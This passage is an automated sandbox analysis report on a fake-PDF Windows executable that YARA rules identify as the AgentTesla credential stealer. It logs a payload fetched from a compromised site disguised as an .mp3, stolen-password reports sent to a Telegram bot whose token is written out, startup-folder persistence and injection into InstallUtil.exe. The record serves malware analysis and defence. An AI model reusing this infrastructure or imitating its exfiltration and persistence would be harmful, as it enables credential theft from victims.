                                                                        {"ok":true,"result":{"message_id":891,"from":{"id":7162202130,"is_bot":true,"first_name":"xxxyyyzzznexy","username":"xxxyyyzzzz_bot"},"chat":{"id":1673719962,"first_name":"Good","last_name":"Fellas","type":"private"},"date":1729020733,"document":{"file_name":"user-114127 2024-10-15 15-32-10.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDe2cOwz1-C-yNXsJmmO7Jijef9D3rAALtFQACfn15UMJON6ZUMqDfNgQ","file_unique_id":"AgAD7RUAAn59eVA","file_size":322},"caption":"New PW Recovered!\n\nTime: 10/15/2024 15:32:10\nUser Name: user/114127\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.649804103.191.208.1224435588C:\Users\user\AppData\Roaming\Guid.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 19:32:26 UTC99OUTGET /hunziq/Sgtuwurbrz.mp3 HTTP/1.1
                                                                        Host: rubberpartsmanufacturers.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 19:32:26 UTC235INHTTP/1.1 200 OK
                                                                        Date: Tue, 15 Oct 2024 19:32:26 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Last-Modified: Tue, 15 Oct 2024 03:31:25 GMT
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 990216
                                                                        Content-Type: audio/mpeg
                                                                        2024-10-15 19:32:26 UTC7957INData Raw: 0d 53 95 bc 78 07 1b 11 e6 75 e1 47 ba c4 44 0a b5 a8 58 f1 8c a0 c7 d2 9e 9f f9 ff 95 f8 5f a2 04 32 89 f9 c2 07 ea 05 3a df a7 d6 5e c7 f2 7a 2e 42 a0 1b 78 b4 5a 16 e6 f9 08 b3 23 19 af e2 06 25 cb fe 8e db c7 31 02 77 25 cb de 37 02 00 e0 64 d6 98 87 23 10 78 e5 6d 91 d5 82 49 0c c4 da 94 83 4e b1 9a 1e 8f 96 fc df e8 f7 e2 17 2a 5e f9 c7 36 38 1a af aa 11 96 cd 00 ac 2c f2 ea da 52 aa 87 0c c7 a7 ec 36 60 96 9e 4a 5b 7c 77 71 48 a8 f5 74 7a 0e 35 e3 03 6f 53 35 d7 24 d0 89 f6 49 1c d9 c4 9a b0 ff c6 98 97 09 a7 86 e0 cb ed 90 03 55 c7 2c 65 db 86 6f fc b1 65 ae 2f 31 6c 97 7d 97 cd c1 ee 1c 18 16 e2 e5 43 fc 7e f7 09 21 24 a2 c0 ec a1 4f 6f ad d1 61 5b 0e 85 3e ca 1c d7 0b c6 ba 4d cc 84 03 83 69 ed 00 5c 80 00 bc f5 b1 5d f3 64 75 38 bb aa a0 ab 22
                                                                        Data Ascii: SxuGDX_2:^z.BxZ#%1w%7d#xmIN*^68,R6`J[|wqHtz5oS5$IU,eoe/1l}C~!$Ooa[>Mi\]du8"
                                                                        2024-10-15 19:32:27 UTC8000INData Raw: 1d fc c0 21 ae 2b 34 22 5f 05 bb 10 0f 19 5e db 3b c1 5e a0 76 27 2d 03 f8 a5 39 b7 7e f0 a8 b9 e1 1a ef 97 97 23 4e 34 a9 c4 40 3d 76 97 95 95 c1 cc 75 7b 3e 9f 36 ef 6e 93 56 d6 3e 68 10 bf 16 7f ee 6c 37 06 fd 77 6f 0c 1c 95 05 ce ec ac 05 b7 68 3e ea a7 20 ff 81 23 41 f2 42 49 0d 36 61 4a 14 83 9c 7c 03 f4 50 93 e6 19 e9 c2 dd d6 f8 6a ae 4c a7 64 93 cd 8b 5b 5f 18 9f 59 83 d0 96 8d f7 1f 3d a1 07 57 e1 bc 89 0c 95 5e 65 4f 92 4a 18 ef ef 29 e3 73 68 4c 12 f2 e8 07 37 c8 e7 ff 77 3c 5e 71 eb 9e 10 98 1f c0 83 3a f5 38 60 28 f9 56 76 1c 9e 0e f6 fa 68 ef ea 78 5f d8 21 66 e9 32 56 41 aa 1a c9 82 c5 55 6e fd 1c 73 52 8d e6 53 0e 52 66 e4 8a 6d b5 43 cc 37 11 a5 de 58 e4 49 fa 0b 7a 56 46 e5 e8 78 a4 f1 37 b2 cc 7f 0a 76 c1 a5 74 82 29 fb a9 d3 a7 a5 35
                                                                        Data Ascii: !+4"_^;^v'-9~#N4@=vu{>6nV>hl7woh> #ABI6aJ|PjLd[_Y=W^eOJ)shL7w<^q:8`(Vvhx_!f2VAUnsRSRfmC7XIzVFx7vt)5
                                                                        2024-10-15 19:32:27 UTC8000INData Raw: b6 38 23 97 0f c1 d2 f3 e2 90 07 ec 02 c0 34 7f 61 4d 15 26 a3 2b 74 66 4e 8b 62 c2 75 b6 20 d0 6e 9c 37 80 5b 96 81 5a e4 0d 01 74 9b 88 dc b8 3a e9 d0 b0 ee c1 fb 57 d4 87 84 3b c0 e9 2d b5 a6 7d 32 a7 0e dd a7 c6 81 65 5b b3 4b 23 ad b7 8d 45 08 00 f4 aa 20 4c d9 66 d2 0c a2 8f 29 b0 1e a4 33 54 88 d9 a1 cc d6 1c f9 c7 e5 b0 ee b8 c5 eb 51 ce dc 8d 20 e2 a3 7c 1a de 54 74 d9 06 65 d1 d8 19 26 3e 0e fa 13 d6 19 58 6c 37 8d a1 00 02 61 46 b3 1b fd c3 9c b6 3a 7e 84 6d 99 9a 56 fe 01 d0 2a 19 87 36 fa be 96 cf 5c 1e d8 03 55 9b e1 cb 2f 85 dc f2 32 00 f4 93 ca b6 85 7a ca 01 1e b3 f2 24 9b b5 ca 7d 5e 28 fc 2f 03 98 db 03 c7 25 cb d4 a7 91 1d 86 df 67 3a ac 84 aa 12 89 48 b5 ae 5b 5c 72 19 6e 04 63 f7 d2 37 4a 9f 56 91 3a d9 2c 6c 38 e2 28 61 32 29 6a fb
                                                                        Data Ascii: 8#4aM&+tfNbu n7[Zt:W;-}2e[K#E Lf)3TQ |Tte&>Xl7aF:~mV*6\U/2z$}^(/%g:H[\rnc7JV:,l8(a2)j
                                                                        2024-10-15 19:32:27 UTC8000INData Raw: 2e 98 38 84 64 33 21 89 99 a0 60 02 7a 11 6b c2 85 3a 73 91 aa 9a 1f fe 33 e9 e8 70 86 5f a4 a6 06 a5 ab 5d 33 7b 54 6a db d1 f2 c0 a5 af 23 8a ec ad 6f 78 d5 cb 3a 67 e6 39 da fa 74 b2 45 2a 19 df 5c 72 46 ca cd e3 29 d2 17 47 0c d8 57 1c a8 08 77 79 f2 c1 a2 a7 16 4a 88 3f 5e 19 62 16 2c 8e c3 cc 3a bc fc 7d 42 5a 0e e7 3c b6 e9 59 52 21 bf 14 54 a3 04 be fa c7 a4 f0 d6 36 4b dd 58 2f 4c 2b 6c 72 28 b7 16 08 66 51 68 78 e8 32 d9 20 16 d1 5a dd bf 85 d4 81 e2 9f 11 a1 6c b2 98 f0 b3 66 57 01 8d 9d 43 39 dc 50 4f c0 f6 ec b0 18 be 47 84 a2 76 dc fe aa 51 c6 69 fc 11 14 a5 18 c2 73 b0 e4 98 8d c5 8a ae 9c e6 02 51 ab 62 85 84 db c1 5d 6d 0f 0f 13 92 b7 3d 67 42 0e 3a b0 9c 80 e9 c9 ac b7 3c e5 c1 ff 48 9d fa 32 bf f1 b4 70 9e f1 4f 70 81 86 ff a8 22 ab 72
                                                                        Data Ascii: .8d3!`zk:s3p_]3{Tj#ox:g9tE*\rF)GWwyJ?^b,:}BZ<YR!T6KX/L+lr(fQhx2 ZlfWC9POGvQisQb]m=gB:<H2pOp"r
                                                                        2024-10-15 19:32:27 UTC8000INData Raw: 55 af 10 d5 8c 3b a3 d8 ed c5 e5 f3 89 6d d3 70 05 c9 2f 10 62 8a 03 8c cb 27 7c 45 d9 5a 35 ff 75 52 08 cb 62 8b ad 78 b2 c5 df 16 f3 7b 00 77 01 03 f7 43 6d 16 0e ae d1 b4 08 5a 7c f6 29 3a 47 47 67 bd fe 92 3c 7d 8a 66 9f d0 c6 2d 6d 3b c6 08 26 8e 49 97 a3 af 8c 48 d2 ed 27 67 db 1d c9 04 41 91 a6 06 9d 2b d7 0b d5 a1 c7 b9 cf 13 49 09 4c a1 30 5e bd d3 b1 c3 45 6b 97 47 2a 3b 0a 6d 52 a2 13 ad 29 6a 2e f6 25 32 72 16 c9 d4 bf 38 a9 02 23 56 7d c3 05 51 07 75 51 99 48 48 85 9c 38 4f 70 df 2f aa 42 dd 9e ac 55 62 c0 ba 0a 89 84 22 b0 e4 77 e9 28 81 c5 e4 e9 f6 8d 39 a8 08 8e 2d 3b 2b 14 88 c0 fa 7a 25 33 c0 b1 12 12 0d 65 c3 62 63 a8 12 d7 92 bc b5 46 97 c2 09 3f 1b 09 b2 1e ab bc cc 78 56 1b f5 55 7e 02 19 5a fc 4d e1 10 a7 7b 81 cd 34 f7 8d a3 9e 4b
                                                                        Data Ascii: U;mp/b'|EZ5uRbx{wCmZ|):GGg<}f-m;&IH'gA+IL0^EkG*;mR)j.%2r8#V}QuQHH8Op/BUb"w(9-;+z%3ebcF?xVU~ZM{4K
                                                                        2024-10-15 19:32:27 UTC8000INData Raw: 02 7b 65 46 0e 46 4e b2 74 fd 8b 8a db e1 51 6a 87 7a 7d 85 1a 3b 73 8d 53 32 6e 9c ce c6 ae 17 c9 16 93 31 5d de 99 19 26 b4 fe 87 e4 85 0e 59 7d 04 e0 66 e9 04 91 c1 7c ef 9b 49 4d 47 13 cb 91 2a d2 55 6a 1e 73 1c f3 fd 1e a0 63 be 49 e4 70 f3 36 55 c0 df 27 67 9a 2f 8f c7 6b 16 09 90 84 b8 c5 49 94 a3 b5 d3 99 1e 98 9b 74 9d 63 17 55 5f 69 52 0b 27 59 fd 5d 0b 1f 0b f5 8c 68 17 be 06 60 35 11 95 3c f8 1f f9 ad 74 08 7a 73 a8 31 34 e0 f3 72 be 28 0e 86 be 83 e8 0a 8f af 12 b4 8a 0a 8e ab 51 f4 dc 87 a5 19 8c 7b d2 75 d7 fe 71 36 c4 1d 00 3d 84 18 5b 1a 18 9a e9 75 b8 00 75 d5 50 93 0a 40 6c 3e 4f b4 c8 d2 3a 7d af f8 b0 54 f9 77 00 ad 3f c6 90 8c 41 65 48 a6 21 8c 82 85 07 b7 24 89 e6 e8 e2 f1 b4 01 6e d9 37 b1 12 d7 82 22 33 52 bd d9 11 75 c9 e9 59 ed
                                                                        Data Ascii: {eFFNtQjz};sS2n1]&Y}f|IMG*UjscIp6U'g/kItcU_iR'Y]h`5<tzs14r(Q{uq6=[uuP@l>O:}Tw?AeH!$n7"3RuY
                                                                        2024-10-15 19:32:27 UTC8000INData Raw: e9 c3 52 b8 f5 96 44 18 89 aa 92 a7 e6 36 af a0 35 4d 29 0e 1c f0 b1 72 42 ca af d4 c4 f0 ea 9b a2 20 c6 1e 03 a8 9e 40 ef 9a e1 95 29 a3 e1 49 0a a2 b6 31 b1 e3 42 c9 2e 6f 95 15 84 b7 87 75 b6 5e 39 b0 a8 05 3d a1 7b 18 87 34 a8 4c 7a d9 7c da 85 b6 8f 14 0d 19 36 a3 d2 92 b1 98 24 2e 84 92 62 66 32 dd f3 c9 2e 36 c5 98 72 8a 77 5b 6a 9d b8 4e 2e e1 eb 0c e2 49 fe d2 35 8b 85 8d 6a 39 be 7e c0 ea 9a 70 40 00 94 ba 2b f8 a9 54 30 15 95 d3 5e 24 06 a6 49 e3 11 2a ea ed 11 f2 ed 34 db 44 6f 28 5f 6e 4f 32 51 5f fe 77 ba 6f 6b 2d e9 b0 2d c3 4f ab 0d aa 39 1e 38 4e 5c 40 1f 8d a6 88 61 5f 5c 25 72 ae a1 57 0a 9c 3c ad 2b 76 14 3f 88 23 74 59 b3 3b 44 9e 53 af 23 20 9c 9d c3 e2 53 cf db ad 1d 31 6b c9 c1 6e 6b 14 9f 43 1a 06 e0 cf f7 4a 47 f8 4d 0b 1e b5 d5
                                                                        Data Ascii: RD65M)rB @)I1B.ou^9={4Lz|6$.bf2.6rw[jN.I5j9~p@+T0^$I*4Do(_nO2Q_wok--O98N\@a_\%rW<+v?#tY;DS# S1knkCJGM
                                                                        2024-10-15 19:32:27 UTC8000INData Raw: 8c ce e9 7b 11 12 a8 86 7f c0 84 ee fa d8 20 76 09 45 42 41 d3 4d 90 43 17 94 7b eb 71 fb 9a 0b ab f5 74 d1 2c f3 4a a3 fe bf 35 01 a1 3a 48 33 4a 7b ff b2 5a c3 0f 37 24 dd 0d ed 5b ca c9 8d 1d 43 fb 36 e6 59 a9 b1 0c 14 43 a6 e9 1d 6d 6d fa 86 05 36 ab 5b 3c 9d 6d 9d 98 cf e9 39 83 50 bd d5 31 3f 8f ca a8 e9 ec a7 b9 d7 a5 e6 ee 99 16 b4 a1 5e 1d e9 cc 50 e9 84 b9 98 58 a4 41 66 fb 45 25 d4 58 49 e3 0d cd 58 2f 19 87 55 3f f7 a6 bf 38 d9 0c 7d ba b9 90 5e 3f 5b 83 3c 7a b5 41 44 4a 5d be 02 92 6d bf 6b 93 b1 01 a0 89 03 54 0d 08 65 1b 7c 58 d2 cf b9 f9 27 6d a4 a4 58 99 0f c6 c4 45 8f c6 0d fe f0 86 e3 5b 32 16 be 01 58 ce 6b 52 b8 a6 31 ea e5 c0 0f ef 08 71 91 ef 94 f1 fa 51 26 ef e4 3b 6b 15 0b 85 7c b6 a4 33 a8 11 2a 95 4d ab fc be 50 22 a8 f7 e0 57
                                                                        Data Ascii: { vEBAMC{qt,J5:H3J{Z7$[C6YCmm6[<m9P1?^PXAfE%XIX/U?8}^?[<zADJ]mkTe|X'mXE[2XkR1qQ&;k|3*MP"W
                                                                        2024-10-15 19:32:27 UTC8000INData Raw: b0 10 6f 7d 77 fe 04 d1 65 28 25 12 95 a1 01 d1 c7 b6 66 39 a4 cd 37 f0 80 6b d9 d7 b3 fb 94 89 8c 51 48 4f 68 8c da 84 84 89 ae 87 ec f7 d8 ef 7d 16 98 4b 1c a2 90 38 0b e5 9d 94 1e 9b 6a 60 82 6c db d4 4e 08 d9 80 f1 da 24 00 69 70 1d 04 4c 27 2e 62 df ae af 97 14 a7 30 a2 2c ee 8b a1 e7 35 88 72 f3 f8 ea 6e 3f 11 d6 87 bc 3d 20 81 08 32 59 02 1b 80 0e 6b 0b 67 9d 42 d5 24 b2 e7 bc cc bd f5 52 56 52 00 d2 5a e4 45 85 1e 29 63 57 67 47 e7 92 69 3a 2b 6f 11 9c 57 75 63 0b 60 0f 4a 2b 99 26 1e c5 d8 dd bd 0c 82 48 bf 6b 28 3b 1d 58 9f 4d ae 7d 3e 20 97 38 35 50 03 88 22 1e 24 06 02 97 9b f9 2f f3 21 ed 7e 05 ce 70 5e 51 5d 2b ff a4 33 28 8b 3a c0 6c db a0 63 75 f2 29 38 c3 cd 89 b0 f3 23 84 af 03 d3 23 6e 46 cb bb c5 24 2d 8d 74 ec 73 3f a9 12 67 0d 11 82
                                                                        Data Ascii: o}we(%f97kQHOh}K8j`lN$ipL'.b0,5rn?= 2YkgB$RVRZE)cWgGi:+oWuc`J+&Hk(;XM}> 85P"$/!~p^Q]+3(:lcu)8##nF$-ts?g
                                                                        2024-10-15 19:32:27 UTC8000INData Raw: 73 c4 65 7d a8 1f 32 a2 5a 29 2e 40 33 ed 7c 5b 0c 86 d8 60 60 45 21 df 39 b9 1f 06 b1 b1 45 57 4b d3 f7 97 79 69 fe 99 10 8a c3 79 26 b5 dd ec 30 4a 39 3e 18 0e 84 a0 f9 1b bf b4 10 03 5e e6 71 8c 0c 3c 16 3c eb 20 d5 f9 67 78 d3 54 b5 60 0c ae 02 3c f4 d1 b1 51 84 c4 89 63 e9 2c 40 8c 61 7e 06 1b f3 47 7e 9b 17 9f 61 cd 40 51 ef f6 79 ac df 20 d5 8b 32 b2 25 0c ae 89 45 65 06 9e 56 44 71 42 fa 7c 2c 88 04 ba 5f 39 c0 9d 3d ae 0f e6 63 a7 42 8a d9 f3 4a 54 e7 73 bb 6c 45 69 b2 b5 ab f1 73 38 c1 57 0f 92 a7 a7 9d 11 e8 40 e7 b4 91 c7 3b 4b 1f ae 2c 37 5a 08 b1 3b ff f5 41 71 bc 9e 5b c0 8a ca a6 90 52 14 d6 86 95 52 9d 04 9a ff f1 ad 9c dd 9e 3f 55 2c 86 07 3d 76 dc 7b ee 0f 41 cd 1c 7d 76 22 39 8a fe ee 38 a3 2d 9f 5a b0 d5 a6 ae 8c 8c bb b3 34 63 68 51
                                                                        Data Ascii: se}2Z).@3|[``E!9EWKyiy&0J9>^q<< gxT`<Qc,@a~G~a@Qy 2%EeVDqB|,_9=cBJTslEis8W@;K,7Z;Aq[RR?U,=v{A}v"98-Z4chQ


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.649831149.154.167.2204436708C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 19:32:31 UTC260OUTPOST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=---------------------------8dced2e9445f11a
                                                                        Host: api.telegram.org
                                                                        Content-Length: 924
                                                                        Expect: 100-continue
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 19:32:31 UTC25INHTTP/1.1 100 Continue
                                                                        2024-10-15 19:32:31 UTC924OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 64 32 65 39 34 34 35 66 31 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 37 33 37 31 39 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 64 32 65 39 34 34 35 66 31 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 31 35 2f 32 30 32 34 20 31 35 3a 33 32 3a 32 39 0a 55 73 65 72
                                                                        Data Ascii: -----------------------------8dced2e9445f11aContent-Disposition: form-data; name="chat_id"1673719962-----------------------------8dced2e9445f11aContent-Disposition: form-data; name="caption"New PW Recovered!Time: 10/15/2024 15:32:29User
                                                                        2024-10-15 19:32:32 UTC1038INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Tue, 15 Oct 2024 19:32:32 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 650
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                        {"ok":true,"result":{"message_id":892,"from":{"id":7162202130,"is_bot":true,"first_name":"xxxyyyzzznexy","username":"xxxyyyzzzz_bot"},"chat":{"id":1673719962,"first_name":"Good","last_name":"Fellas","type":"private"},"date":1729020752,"document":{"file_name":"user-114127 2024-10-15 15-32-29.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDfGcOw1Bay52ZEA2552tOHFfala8tAALuFQACfn15UFuEHTrNEKBkNgQ","file_unique_id":"AgAD7hUAAn59eVA","file_size":322},"caption":"New PW Recovered!\n\nTime: 10/15/2024 15:32:29\nUser Name: user/114127\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:15:31:59
                                                                        Start date:15/10/2024
                                                                        Path:C:\Users\user\Desktop\rScan_0984829339_PDF.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\rScan_0984829339_PDF.exe"
                                                                        Imagebase:0x940000
                                                                        File size:220'160 bytes
                                                                        MD5 hash:A89DCE2412407F0BD1F4B9E575545AEB
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2280814775.0000000003E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2262633916.0000000002F85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2284941068.0000000006920000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2280814775.0000000003F54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:15:32:09
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                        Imagebase:0xc40000
                                                                        File size:42'064 bytes
                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2453773157.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2453773157.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2449463464.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2453773157.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:15:32:22
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs"
                                                                        Imagebase:0x7ff79b850000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:15:32:23
                                                                        Start date:15/10/2024
                                                                        Path:C:\Users\user\AppData\Roaming\Guid.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\Guid.exe"
                                                                        Imagebase:0xd00000
                                                                        File size:220'160 bytes
                                                                        MD5 hash:A89DCE2412407F0BD1F4B9E575545AEB
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2451764397.00000000033C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2482319443.00000000040A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 32%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:15:32:28
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                        Imagebase:0x610000
                                                                        File size:42'064 bytes
                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3430262414.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
